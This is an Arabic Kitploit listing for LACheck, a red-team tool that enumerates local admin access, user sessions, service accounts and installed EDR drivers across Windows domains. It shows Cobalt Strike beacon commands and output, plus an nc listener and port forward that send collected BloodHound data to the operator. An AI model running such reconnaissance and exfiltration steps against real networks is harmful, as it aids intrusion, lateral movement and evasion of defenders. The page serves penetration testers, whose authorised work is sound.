Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
LACheck — تجميعة C# .NET متعددة الخيوط لتعداد الصلاحيات الإدارية المحلية عبر مضيفي ويندوز باستخدام SMB و WMI و WinRM، مع التكامل مع BloodHound لاستطلاع Active Directory. | Kitploit
أدوات/GitHubGitHub/mitchmoser/lacheck
تصعيد الامتيازاتالاستطلاعالحركة الجانبيةجمع المعلوماتاختبار الاختراقالفريق الأحمر
GitHubmitchmoser/lacheck

LACheck

تجميعة C# .NET متعددة الخيوط لتعداد الصلاحيات الإدارية المحلية عبر مضيفي ويندوز باستخدام SMB و WMI و WinRM، مع التكامل مع BloodHound لاستطلاع Active Directory.

عرض المستودع
9315منذ 4 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

LACheck

تعداد صلاحيات الإدارة المحلية باستخدام تجميعات C# .NET متعددة الخيوط

الوسائط

root@kitploit:~
> ./LACheck.exe help
  _                  _____ _               _
 | |        /\      / ____| |             | |
 | |       /  \    | |    | |__   ___  ___| | __
 | |      / /\ \   | |    | '_ \ / _ \/ __| |/ /
 | |____ / ____ \  | |____| | | |  __/ (__|   <
 |______/_/    \_\  \_____|_| |_|\___|\___|_|\_\

الاستخدام:
    LACheck.exe smb rpc /targets:hostname,fqdn.domain.tld,10.10.10.10 /ldap:all /ou:"OU=Special Servers,DC=example,DC=local" /verbose /bloodhound /user:[email protected]

فحوصات المدير المحلي:
    smb   - محاولة الوصول إلى مشاركة C$
    rpc   - محاولة استعلام WMI عن موفر فئة Win32_ComputerSystem عبر RPC
    winrm - محاولة استعلام WMI عن موفر فئة Win32_ComputerSystem عبر جلسة WinRM

الوسائط:
    /bloodhound - إنشاء ملفات مجموعة AdminTo وSession متوافقة مع Bloodhound
                  ملف الإخراج مضغوط ومشفر باسم وكلمة مرور عشوائية
    /dc         - تحديد وحدة تحكم المجال للاستعلام (إذا لم يتم تشغيله على مضيف منضم إلى المجال)
    /domain     - تحديد اسم المجال (إذا لم يتم تشغيله على مضيف منضم إلى المجال)
    /edr        - التحقق من وجود EDR على المضيف (يتطلب smb أو rpc أو winrm)
    /logons     - إرجاع المستخدمين المسجلين على مضيف (يتطلب smb أو rpc أو winrm)
    /registry   - تعداد الجلسات من سجل الخلية (يتطلب smb)
    /services   - إرجاع الخدمات التي تعمل كمستخدمين (يتطلب smb أو rpc أو winrm)
    /socket     - إرسال إخراج bloodhound إلى مقبس TCP بدلاً من الكتابة على القرص
                  مثال: ""127.0.0.1:8080""
    /targets    - قائمة بأسماء المضيفين مفصولة بفواصل للفحص
    /threads    - تحديد الحد الأقصى لعدد الخيوط المتوازية (الافتراضي=25)
    /user       - تحديد اسم المستخدم الذي تم تشغيل التجميع تحته (مفيد أثناء التلاعب بالرموز المميزة)
    /validate   - التحقق من بيانات الاعتماد مقابل المجال قبل مسح الأهداف (مفيد أثناء التلاعب بالرموز المميزة)
    /verbose    - طباعة معلومات تسجيل إضافية
    /ou         - تحديد وحدة تنظيمية LDAP للاستعلام عن كائنات الكمبيوتر الممكّنة منها
                  مثال: "OU=Special Servers,DC=example,DC=local"
    /ldap - استعلام عن المضيفين من مرشحات LDAP التالية:
         :all - جميع أجهزة الكمبيوتر الممكّنة مع المجموعة 'primary' 'Domain Computers'
         :dc  - جميع وحدات تحكم المجال الممكّنة (ليست وحدات تحكم مجال للقراءة فقط)
         :exclude-dc - جميع أجهزة الكمبيوتر الممكّنة التي ليست وحدات تحكم مجال أو وحدات تحكم مجال للقراءة فقط
         :servers - جميع الخوادم الممكّنة
         :servers-exclude-dc - جميع الخوادم الممكّنة باستثناء وحدات تحكم المجال أو وحدات تحكم مجال للقراءة فقط

تنفيذ التجميع

root@kitploit:~
execute-assembly /opt/SharpTools/LACheck smb rpc winrm /ldap:servers-exclude-dc /targets:WEB01,DEV02.contoso.com,10.10.10.10 /logons /threads:10 /verbose

الإخراج

root@kitploit:~
[*] Tasked beacon to run .NET program: LACheck smb rpc winrm /ldap:servers-exclude-dc /targets:WEB01,DEV02.contoso.com,10.10.10.10 /logons /threads:10 /verbose
[+] host called home, sent: 111705 bytes
[+] received Output
[+] Parsed Aguments:
        rpc: True
        smb: True
        winrm: True
        /bloodhound: False
        /edr: False
        /logons: True
        /registry: False
        /services: False
        /ldap: servers-exclude-dc
        /ou:
        /targets:
        /threads: 10
        /user: svcadmin
        /validate: False
        /verbose: False
[+] Performing LDAP query for all enabled computers that are not Domain Controllers or read-only DCs...
[+] This may take some time depending on the size of the environment
[+] LDAP Search Results: 2
[SMB] Admin Success: WEB01 as svcadmin
[session] WEB01 - contoso\devadmin (svcadmin)
[session] WEB01 - contoso\devuser (svcadmin)
[session] WEB01 - contoso\WEB01$ (svcadmin)
[session] WEB01 - contoso\devadmin (svcadmin)
[session] WEB01 - contoso\devuser (svcadmin)
[rdp] WEB01 - contoso\devadmin rdp-tcp#2 Active Last Connection: 00:00:50:26 Last Input: 00:00:00:00  (svcadmin)
[session] WEB01 - contoso\devadmin  4/20/2021 11:00:05 AM (svcadmin)
[session] WEB01 - contoso\devuser 4/20/2021 1:40:52 PM (svcadmin)
[session] WEB01 - contoso\WEB01$ 4/20/2021 5:51:43 PM (svcadmin)
[session] WEB01 - contoso\devadmin 4/20/2021 09:54:38 AM (svcadmin)
[session] WEB01 - contoso\devuser 4/20/2021 10:14:32 AM (svcadmin)
[WinRM] Admin Success: DESKTOP-118GDCE as svcadmin
[WinRM] Admin Success: DEV02.contoso.com as svcadmin
[!] RPC on DEV02.contoso.com - Access denied.
[!] SMB on DEV02.contoso.com - Attempted to perform an unauthorized operation.
[RPC] Admin Success: 10.10.10.10  as svcadmin
[!] SMB on 10.10.10.10 - Attempted to perform an unauthorized operation.
[!] WinRM on 10.10.10.10 - The WinRM client cannot process the request. Default authentication may be used with an IP address under the following conditions: the transport is HTTPS or the destination is in the TrustedHosts list, and explicit credentials are provided. Use winrm.cmd to configure TrustedHosts. Note that computers in the TrustedHosts list might not be authenticated. For more information on how to set TrustedHosts run the following command: winrm help config.

مصادقة WinRM

كما هو موضح في مثال الإخراج أعلاه، فإن محاولة التحقق من WinRM على المضيف بعنوان IP 10.10.10.10 ستؤدي إلى خطأ بسبب عدم محاولة عميل WinRM المصادقة إلى مضيف عبر عنوان IP.

استخدم أسماء المضيفين عند محاولة التحقق من الوصول إلى WinRM.

تحديد الأهداف

يمكن استخدام العلامات /targets و /ldap و /ou معًا أو بشكل منفصل لإنشاء قائمة بالمضيفين للتعداد.

يتم دمج جميع المضيفين الذين تم إرجاعهم من هذه العلامات وإزالة التكرارات قبل بدء التعداد.

Bloodhound

يدعم LACheck كتابة بيانات AdminTo وSession المجمعة في إخراج JSON يمكن تحميله إلى BloodHound

هذا الإخراج يهدف فقط إلى تعزيز مجموعة BloodHound الحالية بصلاحيات إدارية محدثة لمستخدم واحد وجلسات تم جمعها من المضيفين الذين تم تحديد صلاحيات إدارية لهم

سيقوم مفتاح /bloodhound بكتابة ملف zip مشفر باسم عشوائي على القرص يمكن تنزيله واستخراجه وتحميله إلى BloodHound

/user

يتطلب BloodHound حل المستخدمين وأجهزة الكمبيوتر إلى SIDs. نظرًا لتقنيات الانتحال مثل make_token و kerberos_ticket_use في Cobalt Strike، قد لا يتمكن LACheck من تحديد سياق المستخدم بدقة للتجميع. وسيطة /user مطلوبة لتزويد LACheck بـ userprincipalname (التنسيق = [email protected]) للسياق الذي تم تشغيله تحته من أجل ربط معلومات التجميع بدقة.

/socket

يمكن إرسال إخراج BloodHound إلى مقبس TCP بدلاً من الكتابة على القرص.

إذا فشل اتصال TCP، فسيتم كتابة إخراج BloodHound على القرص.

في منارة Cobalt Strike، يمكن إعادة توجيه اتصالات TCP من مضيف إلى جهاز المشغل المحلي باستخدام rportfwd_local:

root@kitploit:~
rportfwd_local 8888 127.0.0.1 8888

يمكن للمشغل بعد ذلك توجيه إخراج تدفق TCP إلى ملف محلي باستخدام netcat:

root@kitploit:~
nc -lvnp 8888 > computers.json 

طرق التعداد

ملخص الأداء

- = غير مطبق

SMB

/edr

مستوحى من نص EDR.cna بواسطة harleyQu1nn

تقوم طريقة Directory.GetFiles بإرجاع قائمة ببرامج التشغيل من:

  • \\host\C$\windows\system32\drivers
  • \\host\C$\windows\sysnative\drivers

يتم البحث عن برامج التشغيل في قائمة برامج التشغيل المعروفة التي تستخدمها بائعي EDR.

مثال على الإخراج عند التشغيل كمستخدم svcadmin

root@kitploit:~
[EDR] WEB01 - Found: CrowdStrike, SentinelOne (svcadmin)
[EDR] DEV02 - no EDR found (svcadmin)

/logons

تقوم NetWkstaUserEnum بإرجاع قائمة بالمستخدمين الذين لديهم تسجيلات دخول تفاعلية وخدمة ودُفعات

تقوم WTSEnumerateSessionsA بإرجاع قائمة بجلسات RDP على مضيف

تقوم WTSQuerySessionInformationA باسترداد معلومات مفصلة لكل جلسة RDP

مثال على الإخراج عند التشغيل كمستخدم svcadmin

root@kitploit:~
[session] WEB01 - contoso\devadmin (svcadmin)
[session] WEB01 - contoso\devuser (svcadmin)
[session] WEB01 - contoso\WEB01$ (svcadmin)
[session] WEB01 - contoso\devadmin (svcadmin)
[session] WEB01 - contoso\devuser (svcadmin)
[rdp] WEB01 - contoso\devadmin rdp-tcp#2 Active Last Connection: 00:00:50:26 Last Input: 00:00:00:00  (svcadmin)

/registry

يتكرر عبر SIDs في خلية \\Computer\HKEY_USERS\، يحاول الوصول إلى Volatile Environment لكل SID، ويسترد القيم من مفاتيح USERDOMAIN و USERNAME.

تتطلب هذه الطريقة تشغيل خدمة Remote Registry على مضيف بعيد. إذا لم تكن قيد التشغيل:

  1. يتم تسجيل نوع بدء التشغيل الأولي لخدمة Remote Registry
  2. يتم تغيير نوع البدء إلى Automatic
  3. يتم بدء خدمة Remote Registry
  4. يتم تعداد خلايا التسجيل
  5. يتم إيقاف خدمة Remote Registry
  6. يتم إعادة نوع البدء إلى قيمته المسجلة الأولية

نظرًا للعملية متعددة الخطوات المحتملة لتعداد كل مضيف، قد تكون هذه الطريقة أبطأ مقارنة بالتقنيات البديلة. smb /logons أسرع

مثال على الإخراج عند التشغيل كمستخدم svcadmin

root@kitploit:~
[registry] WEB01 - contoso\devadmin (svcadmin)

/services

تقوم طريقة ServiceController.GetServices باسترداد قائمة بالخدمات على مضيف

يتم الاستعلام عن كل خدمة لتحديد المستخدم الذي تم تكوينها للتشغيل باسمه.

نظرًا لاستعلام كل خدمة على حدة، قد تكون هذه الطريقة أبطأ مقارنة بالتقنيات البديلة. wmi /services أسرع

مثال على الإخراج عند التشغيل كمستخدم svcadmin

root@kitploit:~
[service] WEB01 - [email protected] Service: secretsvc State: Running (svcadmin)

WMI

/edr

مستوحى من نص EDR.cna بواسطة harleyQu1nn

تقوم فئة CIM_DataFile بإرجاع قائمة ببرامج التشغيل من:

  • \host\C$\windows\system32\drivers
  • \host\C$\windows\sysnative\drivers

يتم البحث عن برامج التشغيل في قائمة برامج التشغيل المعروفة التي تستخدمها بائعي EDR.

مثال على الإخراج عند التشغيل كمستخدم svcadmin

root@kitploit:~
[EDR] WEB01 - Found: CrowdStrike, SentinelOne (svcadmin)
[EDR] DEV02 - no EDR found (svcadmin)

/logons

تقوم فئة Win32_LoggedOnUser بإرجاع قائمة بجلسات تسجيل الدخول تقوم فئة Win32_LogonSession بإرجاع معلومات مفصلة لكل جلسة

مثال على الإخراج عند التشغيل كمستخدم svcadmin

root@kitploit:~
[session] WEB01 - contoso\devadmin  4/20/2021 11:00:05 AM (svcadmin)
[session] WEB01 - contoso\devuser 4/20/2021 1:40:52 PM (svcadmin)
[session] WEB01 - contoso\WEB01$ 4/20/2021 5:51:43 PM (svcadmin)
[session] WEB01 - contoso\devadmin 4/20/2021 09:54:38 AM (svcadmin)
[session] WEB01 - contoso\devuser 4/20/2021 10:14:32 AM (svcadmin)

/registry

يستعلم عن فئة Win32_UserProfile لاسترداد SIDs لملفات تعريف المستخدمين على النظام.

تسترد طريقة EnumKey من فئة StdRegProv خلية \\Computer\HKEY_USERS\ وتحاول الوصول إلى Volatile Environment لكل SID تم إرجاعه لاسترداد القيم من مفاتيح USERDOMAIN و USERNAME.

مثال على الإخراج عند التشغيل كمستخدم svcadmin

root@kitploit:~
[registry] WEB01 - contoso\devadmin (svcadmin)

/services

يستعلم عن فئة Win32_Service لاسترداد اسم الخدمات والمستخدم والحالة

مثال على الإخراج عند التشغيل كمستخدم svcadmin

root@kitploit:~
[service] WEB01 - [email protected] Service: secretsvc State: Running (svcadmin)

WinRM

يتم تنفيذ كل فحص WMI أيضًا باستخدام موارد WMI و تعداد WMI عبر WinRM.

يتجنب ذلك استخدام مساحات تشغيل PowerShell.

تنزيل الأداة
SMBWMIWinRM
/edrسريعسريعسريع
/logonsسريعسريعسريع
/servicesبطيءسريعسريع
/registryبطيءسريع-